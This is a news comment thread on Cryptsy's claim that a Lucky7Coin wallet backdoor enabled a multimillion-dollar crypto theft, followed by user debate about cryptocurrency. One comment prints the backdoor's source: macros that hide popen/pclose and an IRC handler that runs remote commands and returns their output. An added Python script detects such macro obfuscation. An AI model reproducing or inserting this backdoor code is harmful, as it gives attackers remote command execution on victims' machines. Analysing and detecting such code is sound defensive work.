Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)
An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands at more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.
(voice of Nelson)
This issue is a bit more complicated than you think.
"Coins" will never be a legit currency.
Just another reason not to use shitcoin. Even if it wasn't an inside job they pulled themselves, nobody else will get their money back.
Must be a slow news day...
not to mention my keyboard
Well, as the current Litecoin value is around $3, I don't think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers' wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?
This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.
Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them is going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.
I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Just cruising through this digital world at 33 1/3 rpm...
Blames Backdoor In the Code of a Wallet
Or maybe it was bad security.
Don't waste your vote! Vote for whoever you want, unless you live in a swing state it won't matter anyways
I'm more shocked to learn that Litecoin went as up as $9.50.
To report on the status of holdings, and material changes therein.
They hid this for 1.5yr, and that is likely to have resulted in criminal liability since they surely must have continued to take deposits.
Mt. Whatever! Live by the rotting bit, die by the lost coin!
Yours,
Major Boobage
A wallet is a non-executable data file.
You can't get a trojan from one.
Unless you're retarded and use a third party service or program to MANAGE wallets.
https://github.com/alerj78/luc...
dooglus commented on Mar 8, 2015
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
#define S_ORDER(a,b,c,d) b##a##d##c
/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)
/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
Anons need not reply. Questions end with a question mark.
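An added example, not part of the thread or of the Lucky7Coin repository: a small review aid that expands `##` token-pasting macros and re-joins split string literals, so the identifiers hidden by the macros quoted above show up in a code audit. The watch list `EXEC_CALLS` and the function names are assumptions chosen for illustration.

```python
import re

# Calls that start a process or load code; assumption: a reviewer-chosen watch list.
EXEC_CALLS = {"popen", "pclose", "system", "execl", "execv", "execvp", "dlopen"}

FUNC_DEF = re.compile(r"^\s*#\s*define\s+(\w+)\(([^)]*)\)\s+(.+)$")
OBJ_DEF = re.compile(r"^\s*#\s*define\s+(\w+)\s+(.+)$")
CALL = re.compile(r"^(\w+)\(([^)]*)\)$")
SPLIT_STR = re.compile(r'^"[^"]*"(\s+"[^"]*")+$')

# The five macros quoted above, plus one benign define constructed for contrast.
SAMPLE = '''
#define S_ORDER(a,b,c,d) b##a##d##c
#define CLine S_ORDER(I,F,E,L)
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
#define MAX_SIZE 0x02000000
'''

def paste(params, body, args):
    """Expand a function-like macro whose body consists only of ## pasting."""
    binding = dict(zip(params, args))
    return "".join(binding.get(t.strip(), t.strip()) for t in body.split("##"))

def scan(source):
    """Return (macro, expansion, reason) for each obfuscating #define."""
    pasters, findings = {}, []
    for line in source.splitlines():
        m = FUNC_DEF.match(line)
        if m and "##" in m.group(3):
            pasters[m.group(1)] = ([p.strip() for p in m.group(2).split(",")], m.group(3))
            continue
        m = OBJ_DEF.match(line)
        if not m:
            continue
        name, body = m.group(1), m.group(2).strip()
        call = CALL.match(body)
        if call and call.group(1) in pasters:
            params, pbody = pasters[call.group(1)]
            word = paste(params, pbody, [a.strip() for a in call.group(2).split(",")])
            reason = "hidden exec call" if word in EXEC_CALLS else "pasted identifier"
            findings.append((name, word, reason))
        elif SPLIT_STR.match(body):
            joined = "".join(re.findall(r'"([^"]*)"', body))
            findings.append((name, joined, "split string literal"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A plain `grep popen` over the source finds nothing here, which is the point of the macros; running the real preprocessor (`cpp -E`) over the file and diffing against the raw text gives the same visibility on a full code base.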
Meanwhile.... 2.39% of my "realcoin" disappeared on Wall Street today...
Unless you mean someone accessed your account and transferred out 2.39% of your fiat then no, your analogy is wrong. Price fluctuation != Coins/Fiat leaving your account. With price fluctuation nothing is lost unless you sell. Without a sale that down 2.39% is trivia, just like the up 2.xx% the day before.
And that's why "Coins" will never be a legit currency.
That's bad news for crypto anarchists but irrelevant to bitcoin users. Bitcoins remain a convenient transfer mechanism, fast, low fee, guaranteed.
Fiat currency A --> bitcoins --> transfer from user 1 to user 2 --> Fiat currency B.
I'm more shocked to learn that Litecoin went as up as $9.50.
For a minute. What it actually plateaued at for some number of days was $4.50'ish, pre block halving speculation possibly, before it sort of stabilized around $3.00 give or take. Which is what it needed to do, double from $1.50'ish to $3.00'ish, in the block halving so that miners would not lose money, leave, and cause the coin to collapse and fail. Have to give users/speculators enough credit to adjust the price to keep the miners afloat, many currencies can't even manage to do that.
Fiat currency A --> bitcoins --> wallet --> backdoor --> El Chapo
It little behooves the best of us to comment on the rest of us.
By your logic .. drug dealers use physical cash so therefore cash must only be used by drug dealers and drug users. Any crime involving cash should be ignored as it is just criminals robbing criminals.
Way more crimes are committed involving paper money. It's also much more difficult to track.
This bitcoin drug argument is so old and misinformed.
If you took 10 minutes to actually explore what bitcoin was instead of making judgements based off of poor second-hand information maybe you would understand the novelty bitcoin introduces.
Maybe Bitcoin fails as a currency. It does not matter really. Distributed consensus is not going away and that is what bitcoin gives us.
It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.
'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
Bitcoin is primarily for illegal activity right now.
fast, low fee, guaranteed.
Because what I want is to have to pay someone else to use my "money".
Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
Ok, but you are paying for the debit card and credit card transactions. All stores take them and they are charged a processing fee, as such they raise the prices of their items. If you are using cash you are paying for everyone else to use their debit card.
You just don't see the cost when you check out.
Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.
> Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Actually, you pay for that piece of paper over time, because the Treasury Department has to keep printing new ones to replace the ones that wear out, and printing and distributing cash costs money. It's buried in your federal taxes. Also, paper money isn't untraceable. Large bills go through readers that record the serial numbers, and can link that to who deposited or withdrew it. So if you got your $10 at a cash machine, and the person who you gave it to put it back in another bank, they can figure out who made a transaction with who. Generally they don't bother to track $10 transactions, but pull out or deposit thousands in cash, and you can bet they track it.
Bitcoin was designed as electronic cash, it says so on the original white paper. It was designed to overcome the locality limitations of paper money. Try sending $10 in cash from the US to Indonesia in under an hour. With the Bitcoin Network you can do that. With Western Union, not so much.
That exact calculation was done by the Silk Road prosecutors, so we know that 4% of bitcoin transactions were for drugs during the time that marketplace was operating. Whereas for the world economy in general, illegal drugs account for 3% of GDP. It's not an entirely different picture, it's the same picture.
A $10 bill hasn't been money since it was unlinked from the gold standard, it's still currency.
More etc... https://www.youtube.com/watch?v=iFDe5kUUyT0